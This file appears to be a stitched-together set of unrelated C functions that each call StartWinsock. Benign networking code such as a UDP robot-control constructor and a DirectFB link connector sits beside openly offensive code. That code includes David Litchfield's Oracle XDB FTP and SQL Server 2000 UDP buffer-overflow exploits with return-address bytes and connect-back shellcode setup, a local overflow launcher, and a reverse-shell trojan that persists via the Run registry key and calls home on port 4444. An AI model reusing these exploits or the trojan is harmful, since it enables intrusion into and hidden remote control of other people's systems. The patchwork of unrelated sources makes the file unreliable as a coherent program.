// Command-line driver of the Oracle XDB FTP "UNLOCK" overflow exploit that its
// own usage banner describes (D. Litchfield, July 2003).  With anything other
// than five arguments it prints the banner and exits with 0.
// The globals host, exploit_code, short_jump, exception_handler and exploit,
// and the helpers StartWinsock/SetUpExploit/GainControlOfOracle, are defined
// outside this listing; their sizes and contracts are not visible here.
int main(int argc, char *argv[])
{
    if (argc != 6) {
        printf("\n\n\tOracle XDB FTP Service UNLOCK Buffer Overflow Exploit");
        printf("\n\t\tfor Blackhat (http://www.blackhat.com)");
        printf("\n\n\tSpawns a reverse shell to specified port");
        printf("\n\n\tUsage:\t%s host userid password ipaddress port", argv[0]);
        printf("\n\n\tDavid Litchfield\n\t([email protected])");
        printf("\n\t6th July 2003\n\n\n");
        return 0;
    }

    // host is a global of unknown size; strncpy with a 250-byte limit does not
    // NUL-terminate when argv[1] is 250 bytes or longer.
    strncpy(host, argv[1], 250);

    // In this file a zero return from StartWinsock() means failure (other
    // listings on this page use the opposite convention).  The return value of
    // printf (a byte count) becomes the exit status on that path.
    if (StartWinsock() == 0)
        return printf("Error starting Winsock.\n");

    // argv[4]/argv[5]: connect-back address and port handed to the payload setup.
    SetUpExploit(argv[4], atoi(argv[5]));

    // The request is assembled in the global exploit_code buffer, whose
    // capacity is not visible here.
    strcat(exploit_code, short_jump);
    strcat(exploit_code, exception_handler);
    strcat(exploit_code, exploit);
    strcat(exploit_code, "\r\n");

    // argv[2]/argv[3]: FTP user id and password used for the login step.
    GainControlOfOracle(argv[2], argv[3]);

    return 0;
}
// Launcher for a local overflow in the program "nes": builds its command line
// (program name, payload, NOP padding and the addresses explained in the
// comments below) and starts it with WinExec().  The hard-coded addresses are
// for Windows XP SP1 as the original comments state.  exploit, StartWinsock
// and SetUpExploit are defined elsewhere.
// Expects exactly two arguments (address and port handed to SetUpExploit);
// otherwise it exits silently with 0.
int main(int argc, char *argv[])
{
    int cnt = 0;
    unsigned char buffer[1000] = "";

    if (argc != 3)
        return 0;

    // Return value is not checked here, unlike the other drivers on this page.
    StartWinsock();

    // Set the IP address and port in the exploit code
    // If your IP address has a NULL in it then the
    // string will be truncated.
    SetUpExploit(argv[1], atoi(argv[2]));

    // name of the vulnerable program
    strcpy(buffer, "nes ");

    // copy exploit code to the buffer
    strcat(buffer, exploit);

    // Pad out the buffer (25 x 4 NOPs plus one more group below)
    while (cnt < 25) {
        strcat(buffer, "\x90\x90\x90\x90");
        cnt++;
    }
    strcat(buffer, "\x90\x90\x90\x90");

    // Here's where we overwrite the saved return address
    // This is the address of lstrcatA on Windows XP SP 1
    // 0x77E74B66
    strcat(buffer, "\x66\x4B\xE7\x77");

    // Set the return address for lstrcatA
    // this is where our code will be copied to
    // in the TEB
    strcat(buffer, "\xBC\xE1\xFD\x7F");

    // Set the destination buffer for lstrcatA
    // This is in the TEB and we'll return to
    // here.
    strcat(buffer, "\xBC\xE1\xFD\x7F");

    // This is our source buffer. This is the address
    // where we find our original buffer on the stack
    strcat(buffer, "\x10\xFB\x12");

    // Now execute the vulnerable program!
    WinExec(buffer, SW_MAXIMIZE);

    return 0;
}
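// Service entry point: start the logger, initialise Winsock, open the
// listening socket on SERVER_PORT and hand it to ServerLoop().
// Returns -1 on any set-up failure and 1 once ServerLoop() returns.
// LOGFILE, SERVER_PORT, StartLogger, StartWinsock, CreateListenSocket and
// ServerLoop are declared elsewhere; here StartWinsock() returns 0 on success.
int EntryPoint(void)
{
    SOCKET s;

    StartLogger(TEXT(LOGFILE));

    if (StartWinsock() != 0)
        return -1;

    s = CreateListenSocket(SERVER_PORT);
    if ((s == SOCKET_ERROR) || (s == INVALID_SOCKET)) {
        // Winsock was started above; release it on this failure path instead
        // of leaking the library reference (the success path already does).
        WSACleanup();
        return -1;
    }

    ServerLoop(s);

    WSACleanup();

    return 1;
}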
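// Client entry point: connect to argv[1] (default REMOTE_ADDR) on SERVER_PORT,
// run the handshake and, if it succeeds, the interactive command loop.
// Returns EXIT_FAILURE when Winsock or the connection cannot be set up,
// EXIT_SUCCESS otherwise.  conn (with its dh_remote_key, dh_shared_key and
// nonce members), StartWinsock, CreateConnectSocket, ClientHandshake,
// CommandLoop and showmemstats are defined elsewhere.
int main(int argc, char **argv)
{
    SOCKET s;
    char *remote;

    if (argc > 1)
        remote = argv[1];
    else
        remote = REMOTE_ADDR;

    printf("Starting Winsock... ");
    if (StartWinsock() != 0) {
        printf("Failed.\n");
        return EXIT_FAILURE;
    }
    printf("OK.\n");

    printf("Connecting to %s:%d... ", remote, SERVER_PORT);
    if ((s = CreateConnectSocket(remote, SERVER_PORT)) == SOCKET_ERROR) {
        printf("Failed.\n");
        // Winsock was already started; undo that before bailing out.
        WSACleanup();
        return EXIT_FAILURE;
    }
    printf("OK.\n\n");

    // A failed handshake skips the command loop but still reaches the cleanup.
    if (ClientHandshake(s))
        CommandLoop(s);

    WSACleanup();

    // free(NULL) is a no-op, so the buffers can be released unconditionally.
    // NOTE(review): the DH key material is freed without being wiped first;
    // its sizes are not visible here, so no zeroing is added.
    free(conn.dh_remote_key);
    free(conn.dh_shared_key);
    free(conn.nonce);

#ifdef _DEBUG
    showmemstats(stdout);
#endif

    return EXIT_SUCCESS;
}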
/// Construct the UDP transport used for the FRI connection.
/// @param port        local server port; values below 10 are treated as
///                    "unset" and replaced by FRI_DEFAULT_SERVER_PORT
/// @param remoteHost  peer address handed on to Init()
/// Terminates the process with exit(1) when the compiled-in structure sizes
/// do not match (FRI_CHECK_SIZES_OK is false).
friUdp::friUdp(int port, char * remoteHost)
    : serverPort(port)
{
    if (!FRI_CHECK_SIZES_OK) {
        printf("data structure size error!\n");
        exit(1);
    }

    m_timestamp = 0;

    // Callers such as a Simulink block may hand over a placeholder port
    // (e.g. 0); fall back to the library default in that case.
    const bool portUnset = (serverPort < 10);
    if (portUnset)
        serverPort = FRI_DEFAULT_SERVER_PORT;

#ifdef WIN32
    StartWinsock();
#endif

    Init(remoteHost);
}
// Return port number listening on, return 0 if failed to listen int StartListen(int Port) { // If winsock doesn't start return false if (!StartWinsock()) return 0; // Limit port to 1-32767 range if ((Port < 1) || (Port > 32767)) Port = 80; SocketListen = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (SocketListen == INVALID_SOCKET) { SocketListen = NULL; return 0; } sockaddr_in SockAddr; SockAddr.sin_family = AF_INET; SockAddr.sin_port = htons(Port); SockAddr.sin_addr.S_un.S_addr = INADDR_ANY; int Result = bind(SocketListen, (sockaddr*)(&SockAddr), sizeof(SockAddr)); if (Result != 0) { CloseWinsock(); SocketListen = NULL; return 0; } listen(SocketListen, 1); WSAAsyncSelect(SocketListen, fMain, WM_SOCKET, FD_CONNECT | FD_ACCEPT); return Port; };
int main() { //Testausgabe printf("Socket Client\n"); //Variablen initialisieren long returnvalue; char buf[256]; SOCKET acceptSocket; SOCKET connectedSocket; SOCKADDR_IN addr; //Socket Verfügbarkeit prüfen returnvalue = StartWinsock(); if(returnvalue != 0) { printf("Fehler: StartWinsock Fehlercode: %d!\n",returnvalue); return 1; } else { printf("Winsock gestartet!\n"); } //Socket initialisieren acceptSocket = socket(AF_INET,SOCK_STREAM,0); if(acceptSocket == INVALID_SOCKET) { printf("Fehler: Der Socket konnte nicht erstellt werden, fehler code: %d\n",WSAGetLastError()); return 1; } else { printf("Socket erstellt!\n"); } //Verbindung initialisieren memset(&addr,0,sizeof(SOCKADDR_IN)); addr.sin_family = AF_INET; addr.sin_port = htons(12345); addr.sin_addr.s_addr = ADDR_ANY; returnvalue = bind(acceptSocket,(SOCKADDR*)&addr,sizeof(SOCKADDR_IN)); if(returnvalue == SOCKET_ERROR) { printf("Fehler: bind, fehler code: %d\n",WSAGetLastError()); return 1; } else { printf("Socket an port 12345 gebunden\n"); } //Verbindung bereitstellen returnvalue = listen(acceptSocket,10); if(returnvalue == SOCKET_ERROR) { printf("Fehler listen, fehler code: %d",WSAGetLastError()); return 1; } else { printf("AcceptSocket ist im Listen-Modus ...\n"); } //Auf Verbindung warten und herstellen connectedSocket = accept(acceptSocket,NULL,NULL); if(connectedSocket == INVALID_SOCKET) { printf("Fehler: accept, fehler code: %d\n",WSAGetLastError()); return 1; } else { printf("Neue Verbindung wurde akzeptiert!\n"); } //FUNKTION: Endlos-Chat while(1) { //Warten auf Input printf("[-] Warte auf Input ...\n\n"); memset(buf,0,sizeof(buf)); returnvalue = recv(connectedSocket,buf,255,0); if(returnvalue == 0 || returnvalue == SOCKET_ERROR) { printf("Fehler: recv, fehler code: %d\n",WSAGetLastError()); } else { buf[returnvalue]=0; printf("Antwort: %s\n\n",buf); } //Senden von Output printf("Senden: "); fgets(buf,255,stdin); send(connectedSocket,buf,255,0); printf("\nNachricht gesendet!\n\n"); } //Programmende 
printf("\n"); return 0; }
// Reverse-connecting remote shell.  Behaviour visible in this function, which
// is what a defender would look for: it copies its own executable to a fixed
// file name under a directory derived from the current working directory,
// hides its console window and registers that copy under the HKCU Run key
// (both only when DEBUG is off), creates stdin/stdout pipes for a child
// process started by CreateChildProcess(), then retries Winsock start-up,
// socket creation, name resolution of the hard-coded dyndns name and the
// connect to port 4444 every 60 s until each succeeds, and finally shuttles
// data between the socket and the child's pipes (WriteToPipe/ReadFromPipe)
// until exitOnForce is set.  g_hChildStd_* handles, sock, exitOnForce,
// StartWinsock, getAddrFromString, CreateChildProcess, WriteToPipe and
// ReadFromPipe are defined elsewhere.
int main(int argc, char** argv)
{
    char dyndns[] = "www.youradress.com";

    //Get the CWD and append the new Filename for the Copy-Method of the exe itself.
    //Note: Ugly one... leave it in his dark place alone and hope it will die someday..
    // Truncates the CWD at the second backslash (or a '>'); the buffer from
    // _getcwd() is never freed.
    char * buffer;
    buffer = _getcwd(NULL, 0);
    int counter = 0;
    for (int i = 0;; i++) {
        if (counter == 2) {
            if (buffer[i] == '\\' || buffer[i] == '>') {
                buffer[i] = 0;
                break;
            }
        }
        if (buffer[i] == '\\') {
            counter++;
        }
    }
    strcat(buffer, "\\yourfilename.exe");
    CopyFileA(argv[0], buffer, false);

#if !DEBUG
    //Hideing the console window
    HWND hWnd = GetConsoleWindow();
    ShowWindow( hWnd, SW_HIDE );
    //Setting the console name for fun and profit
    //char name[]="SPARTA";
    //SetConsoleTitleA(name);
    char subkey[] = "Software\\Microsoft\\Windows\\CurrentVersion\\Run";
    //char cwd[1024];
    //char asf[] = "lolololol";
    //_getcwd(cwd,1024);
    //strcat(cwd,"\\");
    //strcpy(cwd,**argv);
    //strcat(cwd,argv[0]);
    DWORD shit = 0;
    // Persistence artifact: the copied executable's path becomes the default
    // value of the Run key.
    RegSetValueA(HKEY_CURRENT_USER, subkey, REG_SZ, buffer, shit);
#endif

    // Debug output
#if DEBUG
    printf("Socket Client\n");
#endif

    // Initialise variables
    long returnvalue;
    SOCKADDR_IN addr;
    SECURITY_ATTRIBUTES saAttr;

#if DEBUG
    printf("\n->Start of parent execution.\n");
#endif

    // Set the bInheritHandle flag so pipe handles are inherited.
    saAttr.nLength = sizeof(SECURITY_ATTRIBUTES);
    saAttr.bInheritHandle = TRUE;
    saAttr.lpSecurityDescriptor = NULL;

    // Create a pipe for the child process's STDOUT.
    if ( ! CreatePipe(&g_hChildStd_OUT_Rd, &g_hChildStd_OUT_Wr, &saAttr, 0) )
        exit(2);

    // Ensure the read handle to the pipe for STDOUT is not inherited.
    if ( ! SetHandleInformation(g_hChildStd_OUT_Rd, HANDLE_FLAG_INHERIT, 0) )
        exit(3);

    // Create a pipe for the child process's STDIN.
    if (! CreatePipe(&g_hChildStd_IN_Rd, &g_hChildStd_IN_Wr, &saAttr, 0))
        exit(4);

    // Ensure the write handle to the pipe for STDIN is not inherited.
    if ( ! SetHandleInformation(g_hChildStd_IN_Wr, HANDLE_FLAG_INHERIT, 0) )
        exit(5);

    // Create the child process.
    CreateChildProcess();

    // Further socket handling...
    // Check Winsock availability (retry every 60 s)
    do {
        returnvalue = StartWinsock();
        if (returnvalue != 0) {
#if DEBUG
            printf("[-] Fehler: StartWinsock Fehlercode: %d!\n", returnvalue);
#endif
            Sleep(60000);
        }
#if DEBUG
        else {
            printf("[+] Winsock gestartet!\n");
        }
#endif
    } while (returnvalue != 0);

    // Create the socket (retry every 60 s)
    do {
        sock = socket(AF_INET, SOCK_STREAM, 0);
        if (sock == INVALID_SOCKET) {
#if DEBUG
            printf("[-] Fehler: Der Socket konnte nicht erstellt werden, fehler code: %d\n", WSAGetLastError());
#endif
            Sleep(60000);
        }
#if DEBUG
        else {
            printf("[+] Socket erstellt!\n");
        }
#endif
    } while (sock == INVALID_SOCKET);

    // Set port and IP
    memset(&addr, 0, sizeof(SOCKADDR_IN));
    addr.sin_family = AF_INET;
    addr.sin_port = htons(4444);
    //addr.sin_addr.s_addr = inet_addr("127.0.0.1");
    // Resolve the hard-coded name (retry every 60 s)
    do {
        returnvalue = getAddrFromString(dyndns, &addr);
        if (returnvalue == SOCKET_ERROR) {
#if DEBUG
            printf("[-] Fehler: IP für %s konnte nicht aufgeloest werden.\n");
#endif
            Sleep(60000);
        }
#if DEBUG
        else {
            printf("[+] IP aufgelöst!\n");
        }
#endif
    } while (returnvalue == SOCKET_ERROR);

    // Connect (retry every 60 s)
    do {
        returnvalue = connect(sock, (SOCKADDR*)&addr, sizeof(SOCKADDR));
        if (returnvalue == SOCKET_ERROR) {
#if DEBUG
            printf("[-] Fehler: connect gescheitert, fehler code: %d\n", WSAGetLastError());
#endif
            Sleep(60000);
        }
#if DEBUG
        else {
            printf("[+] Verbindung hergestellt mit %s\n", argv[1]);
        }
#endif
    } while (returnvalue == SOCKET_ERROR);

    // Bridge socket and child process until exitOnForce is raised
    for (;;) {
#if DEBUG
        // Wait for input
        printf("[-] Warte auf Input ...\n\n");
#endif
        WriteToPipe();
        ReadFromPipe();
        if (exitOnForce) {
#if DEBUG
            printf("\n->SYSTEM GOING DOWN!\n");
#endif
            break;
        }
    }

#if DEBUG
    printf("\n->End of parent execution.\n");
#endif

    // The remaining open handles are cleaned up when this process terminates.
    // To avoid resource leaks in a larger application, close handles explicitly.
    return 0;
}
// Command-line driver for the SQL Server 2000 UDP overflow exploit named in
// its own usage banner (Litchfield, modified by lion/HUC).  With one argument
// it only sends the "ping" request; with four it builds the connect-back
// request described in the comments below.  The globals host, request, ping
// and exploit_code, and the helpers StartWinsock/GainControlOfSQL, are
// defined outside this listing, so their sizes and contracts cannot be
// checked here.
int main(int argc, char *argv[])
{
    unsigned int ErrorLevel = 0, len = 0, c = 0;   // len and c are not used below
    int count = 0;                                 // not used below
    char sc[300] = "";                             // not used below
    char ipaddress[40] = "";
    unsigned short port = 0;
    unsigned int ip = 0;
    char *ipt = "";
    char buffer[400] = "";
    unsigned short prt = 0;
    char *prtt = "";

    if (argc != 2 && argc != 5) {
        printf("===============================================================\r\n");
        printf("SQL Server UDP Buffer Overflow Remote Exploit\r\n\n");
        printf("Modified from \"Advanced Windows Shellcode\"\r\n");
        printf("Code by David Litchfield, [email protected]\r\n");
        printf("Modified by lion, fix a bug.\r\n");
        printf("Welcome to HUC Website http://www.cnhonker.com\r\n\n");
        printf("Usage:\r\n");
        printf(" %s Target [<NCHost> <NCPort> <SQLSP>]\r\n\n", argv[0]);
        printf("Exemple:\r\n");
        printf("Target is MSSQL SP 0:\r\n");
        printf(" C:\\>nc -l -p 53\r\n");
        printf(" C:\\>%s db.target.com 202.202.202.202 53 0\r\n", argv[0]);
        printf("Target is MSSQL SP 1 or 2:\r\n");
        printf(" c:\\>%s db.target.com 202.202.202.202\r\n\n", argv[0]);
        return 0;
    }

    // host is a global of unknown size; strncpy leaves it unterminated when
    // argv[1] is 100 bytes or longer.
    strncpy(host, argv[1], 100);

    if (argc == 5) {
        strncpy(ipaddress, argv[2], 36);
        port = atoi(argv[3]);

        // SQL Server 2000 Service pack level
        // The import entry for GetProcAddress in sqlsort.dll
        // is at 0x42ae1010 but on SP 1 and 2 is at 0x42ae101C
        // Need to set the last byte accordingly
        if (argv[4][0] == 0x30) {
            printf("MSSQL SP 0. GetProcAddress @0x42ae1010\r\n");
            exploit_code[9] = 0x10;
        } else {
            printf("MSSQL SP 1 or 2. GetProcAddress @0x42ae101C\r\n");
        }
    }

    // Here a zero return from StartWinsock() means failure.
    ErrorLevel = StartWinsock();
    if (ErrorLevel == 0) {
        printf("Starting Winsock Error.\r\n");
        return 0;
    }

    // Single-argument mode: only the ping request is sent.
    if (argc == 2) {
        strcpy(request, ping);
        GainControlOfSQL();
        return 0;
    }

    strcpy(buffer, exploit_code);

    // set this IP address to connect back to
    // this should be your address
    ip = inet_addr(ipaddress);
    ipt = (char*)&ip;
    buffer[142] = ipt[0];
    buffer[143] = ipt[1];
    buffer[144] = ipt[2];
    buffer[145] = ipt[3];

    // set the TCP port to connect on
    // netcat should be listening on this port
    // e.g. nc -l -p 80
    prt = htons(port);
    prt = prt ^ 0xFFFF;
    prtt = (char *)&prt;
    buffer[160] = prtt[0];
    buffer[161] = prtt[1];

    strcat(request, "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXX");

    // Overwrite the saved return address on the stack
    // This address contains a jmp esp instruction
    // and is in sqlsort.dll.
    strcat(request, "\xDC\xC9\xB0\x42");   // 0x42B0C9DC

    // Need to do a near jump
    strcat(request, "\xEB\x0E\x41\x42\x43\x44\x45\x46");

    // Need to set an address which is writable or
    // sql server will crash before we can exploit
    // the overrun. Rather than choosing an address
    // on the stack which could be anywhere we'll
    // use an address in the .data segment of sqlsort.dll
    // as we're already using sqlsort for the saved
    // return address

    // SQL 2000 no service packs needs the address here
    strcat(request, "\x01\x70\xAE\x42");

    // SQL 2000 Service Pack 2 needs the address here
    strcat(request, "\x01\x70\xAE\x42");

    // just a few nops
    strcat(request, "\x90\x90\x90\x90\x90\x90\x90\x90");

    // tack on exploit code to the end of our request and fire it off
    strcat(request, buffer);

    GainControlOfSQL();

    return 0;
}
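/*
 * Open a TCP connection to hostname:port and fill in the VoodooLink vtable.
 *
 * hostname must be a dotted-quad address: it is passed to inet_addr(), which
 * does no name resolution.  When raw is false the magic value 0x80008676 is
 * written as the first four bytes of the stream.
 *
 * Returns DR_OK on success; D_OOM() when the Link cannot be allocated; the
 * errno-derived result on socket()/connect() failure; DR_INVARG for an
 * unparsable hostname; DR_IO when the initial four bytes cannot be sent.
 * Every failure path now releases the socket (and, once they exist, the mutex
 * and the event) before freeing the Link; the original leaked the socket on
 * the connect and send paths (its "FIXME: how to close the socket?").
 *
 * NOTE(review): this code mixes Winsock (StartWinsock, INVALID_SOCKET,
 * WSACreateEvent) with errno; on Windows the socket error is reported by
 * WSAGetLastError(), not errno, so errno2result() may map the wrong code.
 * Left as is because errno2result()'s contract is not visible here.
 */
DirectResult
voodoo_link_init_connect( VoodooLink *link,
                          const char *hostname,
                          int         port,
                          bool        raw )
{
     int                ret;
     struct sockaddr_in addr;
     Link              *l;

     D_INFO( "Voodoo/Link: Connecting to '%s:%d'...\n", hostname, port );

     StartWinsock();

     l = D_CALLOC( 1, sizeof(Link) );
     if (!l)
          return D_OOM();

     l->socket = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
     if (l->socket == INVALID_SOCKET) {
          ret = errno2result( errno );
          D_PERROR( "Voodoo/Link: Socket creation failed!\n" );
          D_FREE( l );
          return ret;
     }

     addr.sin_family      = AF_INET;
     addr.sin_addr.s_addr = inet_addr( hostname );
     addr.sin_port        = htons( port );

     /* inet_addr() signals a malformed address with INADDR_NONE; previously
        the code went on to connect to the broadcast address. */
     if (addr.sin_addr.s_addr == INADDR_NONE) {
          D_ERROR( "Voodoo/Link: Invalid host address '%s'!\n", hostname );
          closesocket( l->socket );
          D_FREE( l );
          return DR_INVARG;
     }

     ret = connect( l->socket, (const struct sockaddr*) &addr, sizeof(addr) );
     if (ret < 0) {
          ret = errno2result( errno );
          D_PERROR( "Voodoo/Link: Socket connect failed!\n" );
          /* Winsock sockets are released with closesocket(), not close(). */
          closesocket( l->socket );
          D_FREE( l );
          return ret;
     }

     direct_mutex_init( &l->lock );

     l->event = WSACreateEvent();

     if (!raw) {
          link->code = 0x80008676;

          /* Compare against the real size of the field rather than a literal 4. */
          if (send( l->socket, (const char*) &link->code, sizeof(link->code), 0 ) != (int) sizeof(link->code)) {
               D_ERROR( "Voodoo/Link: Coult not write initial four bytes!\n" );
               WSACloseEvent( l->event );
               direct_mutex_deinit( &l->lock );
               closesocket( l->socket );
               D_FREE( l );
               return DR_IO;
          }
     }

     link->priv        = l;
     link->Close       = Close;
     link->Read        = Read;
     link->Write       = Write;
     link->SendReceive = SendReceive;
     link->WakeUp      = WakeUp;
     link->WaitForData = WaitForData;

     return DR_OK;
}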